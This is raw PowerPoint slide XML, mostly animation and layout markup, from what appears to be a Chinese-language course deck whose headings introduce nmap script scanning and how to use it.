                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1299019" y="-203755"/>
              <a:ext cx="1303258" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>脚本</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>扫描</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3531870"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.1 nmap脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="4331970"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="组合 49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="258445" y="2941320"/>
            <a:ext cx="11638280" cy="2962910"/>
            <a:chOff x="407" y="2772"/>
            <a:chExt cx="18328" cy="4666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="407" y="5987"/>
              <a:ext cx="18328" cy="121"/>
              <a:chOff x="1765833" y="4036682"/>
              <a:chExt cx="9317522" cy="50962"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3" name="Rectangle 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3040807" y="4036682"/>
                <a:ext cx="1683494" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4" name="Rectangle 5"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4724303" y="4036682"/>
                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
